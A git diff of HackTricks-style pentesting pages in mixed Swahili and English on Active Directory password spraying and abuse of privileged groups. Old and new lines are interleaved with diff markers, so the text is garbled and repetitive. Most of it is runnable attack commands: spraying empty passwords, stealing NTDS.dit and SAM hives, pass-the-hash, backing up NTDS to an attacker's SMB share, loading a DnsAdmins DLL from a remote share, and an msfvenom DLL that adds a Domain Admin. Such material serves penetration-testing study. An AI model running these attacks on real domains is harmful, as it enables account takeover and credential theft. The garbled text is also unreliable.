Mbinu yenye kelele ndogo ni kufanya spray password isiyo hatari/tupu na kugundua akaunti zinazorejesha STATUS_PASSWORD_MUST_CHANGE, ambayo inaonyesha kuwa password ilitimizwa kwa nguvu na inaweza kubadilishwa bila kujua password ya zamani.
Mbinu yenye kelele kidogo ni spray a benign/empty password na kushika akaunti zinazorejesha STATUS_PASSWORD_MUST_CHANGE, ambayo inaonyesha password ilisitishwa kwa nguvu na inaweza kubadilishwa bila kujua password ya zamani.
Workflow:
- Orodhesha watumiaji (RID brute via SAMR) ili kujenga orodha ya malengo:
- Orodhesha watumiaji (RID brute via SAMR) kujenga orodha ya malengo:
{{#ref}}
../../network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
@ -99,12 +114,12 @@ Workflow:
# NetExec (null/guest) + RID brute to harvest users
netexec smb <dc_fqdn> -u '' -p '' --rid-brute | awk -F'\\\\| ' '/SidTypeUser/ {print $3}' > users.txt
```
- Spray password tupu na endelea kwenye hits ili kunasa akaunti ambazo zinatakiwa kubadilisha password zao wakati wa next logon:
- Spray an empty password na endelea kwenye hits ili capture accounts ambazo lazima kubadilisha password at next logon:
```bash
# Will show valid, lockout, and STATUS_PASSWORD_MUST_CHANGE among results
netexec smb <DC.FQDN> -u users.txt -p '' --continue-on-success
```
- Kwa kila hit, badilisha password kupitia SAMR kwa kutumia NetExecs module (hakuna old password inahitajika wakati "must change" imewekwa):
- Kwa kila hit, badilisha nenosiri kupitia SAMR kwa kutumia NetExecs module (nenosiri la zamani halihitajiki wakati "must change" imewekwa):
```bash
# Strong complexity to satisfy policy
env NEWPASS='P@ssw0rd!2025#' ; \
@ -114,8 +129,8 @@ netexec smb <DC.FQDN> -u <User> -p '' -M change-password -o NEWPASS="$NEWPASS"
netexec smb <DC.FQDN> -u <User> -p "$NEWPASS" --pass-pol
```
Vidokezo vya uendeshaji:
- Hakikisha saa ya mwenyeji wako iko sawa na ile ya DC kabla ya Kerberos-based operations: `sudo ntpdate <dc_fqdn>`.
- [+] bila (Pwn3d!) katika baadhi ya moduli (kwa mfano, RDP/WinRM) inamaanisha creds ni halali lakini akaunti haina interactive logon rights.
- Hakikisha saa ya mwenyeji wako imepangwa sawa na DC kabla ya operesheni zinazotegemea Kerberos: `sudo ntpdate <dc_fqdn>`.
- A [+] bila (Pwn3d!) katika baadhi ya moduli (kwa mfano, RDP/WinRM) ina maana creds ni halali lakini akaunti haina interactive logon rights.
## Brute Force
```bash
@ -123,17 +138,17 @@ legba kerberos --target 127.0.0.1 --username admin --password wordlists/password
```
### Kerberos pre-auth spraying with LDAP targeting and PSO-aware throttling (SpearSpray)
Kerberos pre-authbased spraying inapunguza kelele ikilinganishwa na SMB/NTLM/LDAP bind attempts na inaleta ulinganifu mzuri zaidi na AD lockout policies. SpearSpray inaunganisha LDAP-driven targeting, pattern engine, na ufahamu wa sera (domain policy + PSOs + badPwdCount buffer) kufanya spraying kwa usahihi na kwa usalama. Pia inaweza ku-tag principals zilizodukuliwa katika Neo4j kwa BloodHound pathing.
Kerberos pre-authbased spraying inapunguza kelele ikilinganishwa na SMB/NTLM/LDAP bind attempts na inaendana vizuri na AD lockout policies. SpearSpray inaunganisha LDAP-driven targeting, pattern engine, na policy awareness (domain policy + PSOs + badPwdCount buffer) ili kufanya spraying kwa usahihi na kwa usalama. Pia inaweza ku-tag principals waliodhulumiwa kwenye Neo4j kwa BloodHound pathing.
Key ideas:
- LDAP user discovery with paging and LDAPS support, optionally using custom LDAP filters.
- Domain lockout policy + PSO-aware filtering ili kuacha buffer ya majaribio inayoweza kusanidiwa (threshold) na kuepuka kufunga watumiaji.
- Domain lockout policy + PSO-aware filtering kuacha configurable attempt buffer (threshold) na kuepuka kufunga watumiaji.
- Kerberos pre-auth validation using fast gssapi bindings (generates 4768/4771 on DCs instead of 4625).
- Pattern-based, per-user password generation using variables like names and temporal values derived from each users pwdLastSet.
- Throughput control with threads, jitter, and max requests per second.
- Optional Neo4j integration to mark owned users for BloodHound.
Matumizi ya msingi na ugunduzi:
Basic usage and discovery:
```bash
# List available pattern variables
spearspray -l
@ -144,7 +159,7 @@ spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# LDAPS (TCP/636)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --ssl
```
Kulenga na udhibiti wa muundo:
Kulenga na udhibiti wa mifumo:
```bash
# Custom LDAP filter (e.g., target specific OU/attributes)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local \
@ -161,11 +176,11 @@ spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# Leave N attempts in reserve before lockout (default threshold: 2)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -thr 2
```
Uboreshaji wa Neo4j/BloodHound:
Neo4j/BloodHound uboreshaji:
```bash
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound --uri bolt://localhost:7687
```
Muhtasari wa mfumo wa patterns (patterns.txt):
Muhtasari wa mfumo wa pattern (patterns.txt):
```text
# Example templates consuming per-user attributes and temporal context
{name}{separator}{year}{suffix}
@ -176,27 +191,27 @@ Muhtasari wa mfumo wa patterns (patterns.txt):
```
Available variables include:
- {name}, {samaccountname}
- Muda kutoka kwa pwdLastSet ya kila mtumiaji (au whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
- Vifaa vya muundo na tokeni ya shirika: {separator}, {suffix}, {extra}
- Temporal from each users pwdLastSet (or whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
- Composition helpers and org token: {separator}, {suffix}, {extra}
Vidokezo vya uendeshaji:
- Pendelea kuwasilisha maswali kwa PDC-emulator kwa kutumia -dc ili kusoma badPwdCount na taarifa za sera zinazoaminika zaidi.
- Urejeshaji wa badPwdCount unaanzishwa kwenye jaribio linalofuata baada ya dirisha la uchunguzi; tumia kizingiti na upangaji wa wakati ili kuwa salama.
- Majaribio ya Kerberos pre-auth yanaonekana kama 4768/4771 katika DC telemetry; tumia jitter na rate-limiting ili kuendana na trafiki ya kawaida.
Operational notes:
- Favor querying the PDC-emulator with -dc to read the most authoritative badPwdCount and policy-related info.
- badPwdCount resets are triggered on the next attempt after the observation window; use threshold and timing to stay safe.
- Kerberos pre-auth attempts surface as 4768/4771 in DC telemetry; use jitter and rate-limiting to blend in.
> Kidokezo: Saizi ya ukurasa wa LDAP inayotumika kwa SpearSpray ni 200; rekebisha kwa -lps inapohitajika.
> Kidokezo: SpearSprays default LDAP page size is 200; adjust with -lps as needed.
## Outlook Web Access
Kuna zana nyingi za p**assword spraying outlook**.
Kuna zana mbalimbali kwa ajili ya p**assword spraying outlook**.
- Kwa [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
- Kwa [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
- Kwa [Ruler](https://github.com/sensepost/ruler) (inayotegemewa!)
- Kwa [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
- Kwa [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)
- Kwa kutumia [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
- Kwa kutumia [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
- Kwa kutumia [Ruler](https://github.com/sensepost/ruler) (inayoaminika!)
- Kwa kutumia [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
- Kwa kutumia [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)
Ili kutumia zana yoyote kati ya hizi, unahitaji orodha ya watumiaji na password / a small list of passwords to spray.
Ili kutumia yoyote ya zana hizi, unahitaji orodha ya watumiaji na password / orodha ndogo ya passwords za spray.
```bash
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
@ -227,6 +242,7 @@ Ili kutumia zana yoyote kati ya hizi, unahitaji orodha ya watumiaji na password
- [www.blackhillsinfosec.com/?p=5296](https://www.blackhillsinfosec.com/?p=5296)
- [https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying](https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying)
- [HTB Sendai 0xdf: from spray to gMSA to DA/SYSTEM](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html)
- [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,8 +1,8 @@
# Privileged Groups
# Makundi Yenye Vibali
{{#include ../../banners/hacktricks-training.md}}
## Well Known groups with administration privileges
## Makundi Yanayojulikana Yenye Vibali vya Usimamizi
- **Administrators**
- **Domain Admins**
@ -10,82 +10,82 @@
## Account Operators
Kikundi hiki kina uwezo wa kuunda akaunti na vikundi ambavyo si wasimamizi kwenye kikoa. Aidha, kinaruhusu kuingia kwa ndani kwenye Domain Controller (DC).
Kikundi hiki kimepewa uwezo wa kuunda akaunti na makundi ambayo si administrators kwenye domain. Zaidi ya hayo, kinaruhusu kuingia kwa ndani (local login) kwenye Domain Controller (DC).
Ili kubaini wanachama wa kikundi hiki, amri ifuatayo inatekelezwa:
```bash
Get-NetGroupMember -Identity "Account Operators" -Recurse
```
Kuongeza watumiaji wapya kunaruhusiwa, pamoja na kuingia kwa ndani kwenye DC01.
Inaruhusiwa kuongeza watumiaji wapya, pamoja na kuingia kwa ndani kwenye DC.
## Kundi la AdminSDHolder
## Kikundi cha AdminSDHolder
Orodha ya Udhibiti wa Ufikiaji (ACL) ya kundi la **AdminSDHolder** ni muhimu kwani inaweka ruhusa kwa "vikundi vilivyolindwa" ndani ya Active Directory, ikiwa ni pamoja na vikundi vyenye mamlaka ya juu. Mekanismu hii inahakikisha usalama wa vikundi hivi kwa kuzuia mabadiliko yasiyoruhusiwa.
Orodha ya Udhibiti wa Ufikiaji (ACL) ya kikundi cha **AdminSDHolder** ni muhimu kwani inaweka ruhusa kwa makundi yote yaliyolindwa ndani ya Active Directory, ikiwa ni pamoja na makundi yenye vibali vya juu. Mekanismu hii inahakikisha usalama wa makundi haya kwa kuzuia mabadiliko yasiyoruhusiwa.
Mshambuliaji anaweza kutumia hili kwa kubadilisha ACL ya kundi la **AdminSDHolder**, akitoa ruhusa kamili kwa mtumiaji wa kawaida. Hii itampa mtumiaji huyo udhibiti kamili juu ya vikundi vyote vilivyolindwa. Ikiwa ruhusa za mtumiaji huyu zitabadilishwa au kuondolewa, zitarudishwa kiotomatiki ndani ya saa moja kutokana na muundo wa mfumo.
Mshambuliaji anaweza kuitumia hili kwa kubadilisha ACL ya kikundi cha **AdminSDHolder**, na kumpa mtumiaji wa kawaida ruhusa kamili. Hii ingempa mtumiaji huyo udhibiti kamili juu ya makundi yote yaliyolindwa. Iwapo ruhusa za mtumiaji huyo zitabadilishwa au kuondolewa, zitarejeshwa kiotomatiki ndani ya saa moja kutokana na muundo wa mfumo.
Amri za kupitia wanachama na kubadilisha ruhusa ni:
Amri za kukagua wanachama na kubadilisha ruhusa ni pamoja na:
```bash
Get-NetGroupMember -Identity "AdminSDHolder" -Recurse
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}
```
Inapatikana skripti ili kuharakisha mchakato wa urejeleaji: [Invoke-ADSDPropagation.ps1](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1).
Skripti inapatikana ili kuharakisha mchakato wa urejesho: [Invoke-ADSDPropagation.ps1](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1).
Kwa maelezo zaidi, tembelea [ired.team](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence).
## AD Recycle Bin
Uanachama katika kundi hili unaruhusu kusoma vitu vilivyofutwa vya Active Directory, ambavyo vinaweza kufichua taarifa nyeti:
Uanachama katika kikundi hiki unaruhusu kusoma vitu vilivyofutwa vya Active Directory, ambavyo vinaweza kufichua taarifa nyeti:
```bash
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
```
### Domain Controller Access
### Ufikiaji wa Domain Controller
Upatikanaji wa faili kwenye DC umewekwa mipaka isipokuwa mtumiaji ni sehemu ya kundi la `Server Operators`, ambalo hubadilisha kiwango cha upatikanaji.
Ufikiaji wa faili kwenye DC umewekewa vikwazo isipokuwa mtumiaji ni sehemu ya kikundi cha `Server Operators`, ambalo hubadilisha kiwango cha ufikiaji.
### Privilege Escalation
### Kupandisha Vibali
Kwa kutumia `PsService` au `sc` kutoka Sysinternals, mtu anaweza kuchunguza na kubadilisha ruhusa za huduma. Kundi la `Server Operators`, kwa mfano, lina udhibiti kamili juu ya huduma fulani, kuruhusu utekelezaji wa amri za kiholela na kupandisha hadhi:
Kwa kutumia `PsService` au `sc` kutoka Sysinternals, mtu anaweza kukagua na kubadilisha ruhusa za huduma. Kwa mfano, kikundi cha `Server Operators` kina udhibiti kamili juu ya huduma fulani, kuruhusu utekelezaji wa amri zozote na kupandisha vibali:
```cmd
C:\> .\PsService.exe security AppReadiness
```
Amri hii inaonyesha kwamba `Server Operators` wana ufikiaji kamili, wakiruhusu kubadilisha huduma kwa ajili ya haki za juu.
Amri hii inaonyesha kwamba `Server Operators` wana ufikiaji kamili, kuruhusu kusimamia huduma za mfumo ili kupata vibali vilivyoongezwa.
## Backup Operators
Uanachama katika kundi la `Backup Operators` unatoa ufikiaji wa mfumo wa faili wa `DC01` kutokana na haki za `SeBackup` na `SeRestore`. Haki hizi zinaruhusu kupita kwenye folda, kuorodhesha, na uwezo wa kunakili faili, hata bila ruhusa maalum, kwa kutumia bendera ya `FILE_FLAG_BACKUP_SEMANTICS`. Kutumia scripts maalum ni muhimu kwa mchakato huu.
Uanachama kwenye kikundi cha `Backup Operators` hutoa ufikiaji kwa mfumo wa faili wa `DC01` kutokana na vibali vya `SeBackup` na `SeRestore`. Vibali hivi vinaruhusu kutembea ndani ya folda, kuorodhesha, na kunakili faili, hata bila ruhusa za wazi, kwa kutumia bendera ya `FILE_FLAG_BACKUP_SEMANTICS`. Ni muhimu kutumia scripts maalum kwa mchakato huu.
Ili kuorodhesha wanachama wa kundi, tekeleza:
Ili kuorodhesha wanachama wa kikundi, tekeleza:
```bash
Get-NetGroupMember -Identity "Backup Operators" -Recurse
```
### Local Attack
### Shambulio la Lokali
Ili kutumia haki hizi kwa ndani, hatua zifuatazo zinatumika:
Ili kutumia vibali hivi kwa lokali, hatua zifuatazo zinafanywa:
1. Ingiza maktaba muhimu:
1. Ingiza maktaba zinazohitajika:
```bash
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
```
2. Wezesha na thibitisha `SeBackupPrivilege`:
2. Washa na uhakikishe `SeBackupPrivilege`:
```bash
Set-SeBackupPrivilege
Get-SeBackupPrivilege
```
3. Pata na nakili faili kutoka kwa saraka zilizo na vizuizi, kwa mfano:
3. Kufikia na kunakili faili kutoka kwa saraka zilizozuiliwa, kwa mfano:
```bash
dir C:\Users\Administrator\
Copy-FileSeBackupPrivilege C:\Users\Administrator\report.pdf c:\temp\x.pdf -Overwrite
```
### AD Attack
### Shambulio la AD
Upatikanaji wa moja kwa moja wa mfumo wa faili wa Domain Controller unaruhusu wizi wa hifadhidata ya `NTDS.dit`, ambayo ina hash zote za NTLM za watumiaji na kompyuta za eneo.
Upatikanaji wa moja kwa moja kwenye mfumo wa faili wa Domain Controller unaruhusu uibiwa wa hifadhidata ya `NTDS.dit`, ambayo ina NTLM hashes zote za watumiaji na kompyuta za domain.
#### Using diskshadow.exe
#### Kutumia diskshadow.exe
1. Create a shadow copy of the `C` drive:
1. Unda shadow copy ya drive `C`:
```cmd
diskshadow.exe
set verbose on
@ -98,11 +98,11 @@ expose %cdrive% F:
end backup
exit
```
2. Nakili `NTDS.dit` kutoka kwa nakala ya kivuli:
2. Nakili `NTDS.dit` kutoka kwenye shadow copy:
```cmd
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
```
Mbali na hayo, tumia `robocopy` kwa ajili ya nakala za faili:
Badala yake, tumia `robocopy` kwa kunakili faili:
```cmd
robocopy /B F:\Windows\NTDS .\ntds ntds.dit
```
@ -111,14 +111,22 @@ robocopy /B F:\Windows\NTDS .\ntds ntds.dit
reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV
```
4. Pata hash zote kutoka `NTDS.dit`:
4. Pata hash zote kutoka kwa `NTDS.dit`:
```shell-session
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
```
5. Baada ya uchimbaji: Pass-the-Hash kwa DA
```bash
# Use the recovered Administrator NT hash to authenticate without the cleartext password
netexec winrm <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> -x "whoami"
# Or execute via SMB using an exec method
netexec smb <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> --exec-method smbexec -x cmd
```
#### Kutumia wbadmin.exe
1. Sanidi mfumo wa faili wa NTFS kwa seva ya SMB kwenye mashine ya mshambuliaji na uhifadhi akiba ya akreditivu za SMB kwenye mashine lengwa.
2. Tumia `wbadmin.exe` kwa ajili ya akiba ya mfumo na uchimbaji wa `NTDS.dit`:
1. Sanidi mfumo wa faili NTFS kwa SMB server kwenye mashine ya mshambuliaji na uhifadhi (cache) nywila za SMB kwenye mashine lengwa.
2. Tumia `wbadmin.exe` kwa ajili ya chelezo ya mfumo na uchimbaji wa `NTDS.dit`:
```cmd
net use X: \\<AttackIP>\sharename /user:smbuser password
echo "Y" | wbadmin start backup -backuptarget:\\<AttackIP>\sharename -include:c:\windows\ntds
@ -126,23 +134,29 @@ wbadmin get versions
echo "Y" | wbadmin start recovery -version:<date-time> -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
```
Kwa maonyesho ya vitendo, angalia [DEMO VIDEO WITH IPPSEC](https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610s).
For a practical demonstration, see [DEMO VIDEO WITH IPPSEC](https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610s).
## DnsAdmins
Wajumbe wa kundi la **DnsAdmins** wanaweza kutumia mamlaka yao kupakia DLL isiyo na mipaka kwa haki za SYSTEM kwenye seva ya DNS, mara nyingi inayoendeshwa kwenye Wasimamizi wa Kikoa. Uwezo huu unaruhusu uwezekano mkubwa wa unyakuzi.
Wanachama wa kundi la **DnsAdmins** wanaweza kutumia vibali vyao kupakia DLL yoyote yenye vibali vya SYSTEM kwenye DNS server, mara nyingi iliyoendesha kwenye Domain Controllers. Uwezo huu unaruhusu matumizi mabaya yenye athari kubwa.
Ili orodhesha wajumbe wa kundi la DnsAdmins, tumia:
Ili kuorodhesha wanachama wa kundi la DnsAdmins, tumia:
```bash
Get-NetGroupMember -Identity "DnsAdmins" -Recurse
```
### Teua DLL isiyokuwa na mipaka
### Endesha DLL yoyote (CVE202140469)
Wajumbe wanaweza kufanya seva ya DNS kupakia DLL isiyokuwa na mipaka (iwe kwa ndani au kutoka kwa sehemu ya mbali) kwa kutumia amri kama:
> [!NOTE]
> Hitilafu hii inaruhusu utekelezaji wa msimbo wowote kwa vibali vya SYSTEM katika huduma ya DNS (kawaida ndani ya DCs). Tatizo hili lilirekebishwa mwaka 2021.
Wanachama wanaweza kufanya server ya DNS kupakia DLL yoyote (kwa ndani au kutoka kwa share ya mbali) kwa kutumia amri kama:
```bash
dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.dll
dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-DLL.dll
An attacker could modify the DLL to add a user to the Domain Admins group or execute other commands with SYSTEM privileges. Example DLL modification and msfvenom usage:
# If dnscmd is not installed run from aprivileged PowerShell session:
Install-WindowsFeature -Name RSAT-DNS-Server -IncludeManagementTools
```
```c
@ -158,23 +172,24 @@ system("C:\\Windows\\System32\\net.exe group \"Domain Admins\" Hacker /add /doma
// Generate DLL with msfvenom
msfvenom -p windows/x64/exec cmd='net group "domain admins" <username> /add /domain' -f dll -o adduser.dll
```
Kuanza upya huduma ya DNS (ambayo inaweza kuhitaji ruhusa za ziada) ni muhimu ili DLL iweze kupakiwa:
Kuanza upya huduma ya DNS (ambayo inaweza kuhitaji ruhusa za ziada) inahitajika ili DLL ipakwe:
```csharp
sc.exe \\dc01 stop dns
sc.exe \\dc01 start dns
```
Kwa maelezo zaidi kuhusu njia hii ya shambulio, rejelea ired.team.
Kwa maelezo zaidi kuhusu vektori hii ya shambulio, rejea ired.team.
#### Mimilib.dll
Pia inawezekana kutumia mimilib.dll kwa ajili ya utekelezaji wa amri, kuibadilisha ili kutekeleza amri maalum au shells za kurudi. [Check this post](https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html) kwa maelezo zaidi.
Inawezekana pia kutumia mimilib.dll kwa utekelezaji wa amri, ukibadilisha ili kutekeleza amri maalum au reverse shells. [Check this post](https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html) kwa maelezo zaidi.
### WPAD Record kwa MitM
### WPAD Rekodi kwa MitM
DnsAdmins wanaweza kubadilisha rekodi za DNS ili kufanya shambulio la Man-in-the-Middle (MitM) kwa kuunda rekodi ya WPAD baada ya kuzima orodha ya kuzuia maswali ya kimataifa. Zana kama Responder au Inveigh zinaweza kutumika kwa ajili ya kudanganya na kukamata trafiki ya mtandao.
DnsAdmins wanaweza kuathiri rekodi za DNS ili kufanya shambulio za Man-in-the-Middle (MitM) kwa kuunda rekodi ya WPAD baada ya kuzima global query block list. Zana kama Responder au Inveigh zinaweza kutumika kwa spoofing na kukamata trafiki ya mtandao.
### Wasilishi wa Kumbukumbu za Matukio
Wajumbe wanaweza kufikia kumbukumbu za matukio, huenda wakapata taarifa nyeti kama nywila za maandiko au maelezo ya utekelezaji wa amri:
### Wasomaji wa logi za matukio
Wanachama wanaweza kufikia logi za matukio, kwa uwezekano kupata taarifa nyeti kama nywila za maandishi wazi (plaintext) au maelezo ya utekelezaji wa amri:
```bash
# Get members and search logs for sensitive information
Get-NetGroupMember -Identity "Event Log Readers" -Recurse
@ -182,66 +197,70 @@ Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Va
```
## Exchange Windows Permissions
Kikundi hiki kinaweza kubadilisha DACLs kwenye kituo cha kikoa, huenda kikatoa ruhusa za DCSync. Mbinu za kupandisha hadhi zinazotumia kikundi hiki zimeelezewa katika repo ya Exchange-AD-Privesc ya GitHub.
Kikundi hiki kinaweza kubadilisha DACLs kwenye domain object, na hivyo kuweza kutoa ruhusa za DCSync. Mbinu za privilege escalation zinazotumia kikundi hiki zimetajwa kwa undani kwenye Exchange-AD-Privesc GitHub repo.
```bash
# List members
Get-NetGroupMember -Identity "Exchange Windows Permissions" -Recurse
```
## Wataalam wa Hyper-V
## Hyper-V Administrators
Wataalam wa Hyper-V wana ufikiaji kamili wa Hyper-V, ambayo inaweza kutumika kuteka udhibiti wa Wasimamizi wa Kikoa wa virtual. Hii inajumuisha kunakili DCs za moja kwa moja na kutoa NTLM hashes kutoka kwa faili ya NTDS.dit.
Hyper-V Administrators wana upatikanaji kamili wa Hyper-V, ambao unaweza kutumika kupata udhibiti wa Domain Controllers zilizovirtualishwa. Hii inajumuisha cloning ya live DCs na kutoa NTLM hashes kutoka kwa faili NTDS.dit.
### Mfano wa Kutumia
### Exploitation Example
Huduma ya Matengenezo ya Mozilla ya Firefox inaweza kutumika na Wataalam wa Hyper-V kutekeleza amri kama SYSTEM. Hii inahusisha kuunda kiungo kigumu kwa faili ya SYSTEM iliyo na ulinzi na kuibadilisha na executable mbaya:
Firefox's Mozilla Maintenance Service inaweza kutumika na Hyper-V Administrators kutekeleza amri kama SYSTEM. Hii inahusisha kuunda hard link kwa faili ya SYSTEM iliyo na ulinzi na kuibadilisha kwa executable hatarishi:
```bash
# Take ownership and start the service
takeown /F C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
sc.exe start MozillaMaintenance
```
Note: Utekelezaji wa kiungo kigumu umepunguziliwa mbali katika sasisho za hivi karibuni za Windows.
Note: Hard link exploitation imepunguzwa katika masasisho ya hivi karibuni ya Windows.
## Usimamizi wa Shirika
## Group Policy Creators Owners
Katika mazingira ambapo **Microsoft Exchange** imewekwa, kundi maalum linalojulikana kama **Usimamizi wa Shirika** lina uwezo mkubwa. Kundi hili lina haki ya **kufikia sanduku la barua la watumiaji wote wa kikoa** na lina **udhibiti kamili juu ya 'Makundi ya Usalama ya Microsoft Exchange'** Kitengo cha Shirika (OU). Udhibiti huu unajumuisha kundi la **`Exchange Windows Permissions`**, ambalo linaweza kutumika kwa ajili ya kupandisha hadhi.
Kikundi hiki kinawawezesha wanachama kuunda Group Policies katika domain. Hata hivyo, wanachama wake hawawezi apply group policies kwa watumiaji au vikundi au kuhariri GPOs zilizopo.
### Utekelezaji wa Haki na Amri
## Organization Management
#### Opereta wa Print
Katika mazingira ambapo **Microsoft Exchange** imewekwa, kikundi maalum kinachojulikana kama **Organization Management** kina uwezo mkubwa. Kikundi hiki kina haki ya **access the mailboxes of all domain users** na kinahifadhi **full control over the 'Microsoft Exchange Security Groups'** Organizational Unit (OU). Udhibiti huu unajumuisha kikundi cha **`Exchange Windows Permissions`**, ambacho kinaweza kutumika kwa privilege escalation.
Wajumbe wa kundi la **Opereta wa Print** wanapewa haki kadhaa, ikiwa ni pamoja na **`SeLoadDriverPrivilege`**, ambayo inawaruhusu **kuingia kwa ndani kwenye Kidhibiti cha Kikoa**, kuifunga, na kusimamia printa. Ili kutumia haki hizi, hasa ikiwa **`SeLoadDriverPrivilege`** haionekani chini ya muktadha usio na hadhi, kupita Udhibiti wa Akaunti ya Mtumiaji (UAC) ni muhimu.
### Privilege Exploitation and Commands
Ili kuorodhesha wajumbe wa kundi hili, amri ifuatayo ya PowerShell inatumika:
#### Print Operators
Wanachama wa **Print Operators** wamepewa haki kadhaa, ikiwemo **`SeLoadDriverPrivilege`**, ambayo inawawezesha **log on locally to a Domain Controller**, kuizima, na kusimamia printers. Ili kutekeleza misingi ya haki hizi, hasa ikiwa **`SeLoadDriverPrivilege`** haionekani chini ya muktadha usio na elevation, ni lazima kupitisha User Account Control (UAC).
Ili kuorodhesha wanachama wa kikundi hiki, amri ya PowerShell ifuatayo inatumika:
```bash
Get-NetGroupMember -Identity "Print Operators" -Recurse
```
Kwa mbinu za kina za unyakuzi zinazohusiana na **`SeLoadDriverPrivilege`**, mtu anapaswa kutafuta rasilimali maalum za usalama.
Kwa mbinu za kina za exploitation zinazohusiana na **`SeLoadDriverPrivilege`**, tafuta rasilimali maalum za usalama.
#### Watumiaji wa Desktop ya Kijijini
#### Watumiaji wa Remote Desktop
Wajumbe wa kundi hili wanapewa ufikiaji wa PCs kupitia Protokali ya Desktop ya Kijijini (RDP). Ili kuhesabu wajumbe hawa, amri za PowerShell zinapatikana:
Wanachama wa kikundi hiki wanapewa upatikanaji wa PC kupitia Remote Desktop Protocol (RDP). Ili kuorodhesha wanachama hawa, amri za PowerShell zinapatikana:
```bash
Get-NetGroupMember -Identity "Remote Desktop Users" -Recurse
Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Desktop Users"
```
Maelezo zaidi kuhusu kutumia RDP yanaweza kupatikana katika rasilimali maalum za pentesting.
Maelezo zaidi kuhusu exploiting RDP yanaweza kupatikana katika rasilimali maalum za pentesting.
#### Watumiaji wa Usimamizi wa Kijijini
#### Watumiaji wa Usimamizi wa Mbali
Wajumbe wanaweza kufikia PCs kupitia **Windows Remote Management (WinRM)**. Uhesabu wa wajumbe hawa unafanywa kupitia:
Wanachama wanaweza kufikia PC kupitia **Windows Remote Management (WinRM)**. Uorodheshaji wa wanachama hawa unafanywa kupitia:
```bash
Get-NetGroupMember -Identity "Remote Management Users" -Recurse
Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Management Users"
```
Kwa mbinu za unyakuzi zinazohusiana na **WinRM**, nyaraka maalum zinapaswa kutumika.
Kwa exploitation techniques zinazohusiana na **WinRM**, inashauriwa kushauriana na nyaraka maalum.
#### Watoa Huduma wa Seva
#### Server Operators
Kikundi hiki kina ruhusa za kufanya usanidi mbalimbali kwenye Wasimamizi wa Kikoa, ikiwa ni pamoja na ruhusa za kuhifadhi na kurejesha, kubadilisha muda wa mfumo, na kuzima mfumo. Ili kuhesabu wanachama, amri iliyotolewa ni:
Kikundi hiki kina ruhusa za kufanya usanidi mbalimbali kwenye Domain Controllers, ikiwa ni pamoja na ruhusa za kuhifadhi nakala na kurejesha (backup/restore), kubadilisha saa ya mfumo, na kuzima mfumo. Ili kuorodhesha wanachama, amri iliyotolewa ni:
```bash
Get-NetGroupMember -Identity "Server Operators" -Recurse
```
## References <a href="#references" id="references"></a>
## Marejeo <a href="#references" id="references"></a>
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)
- [https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
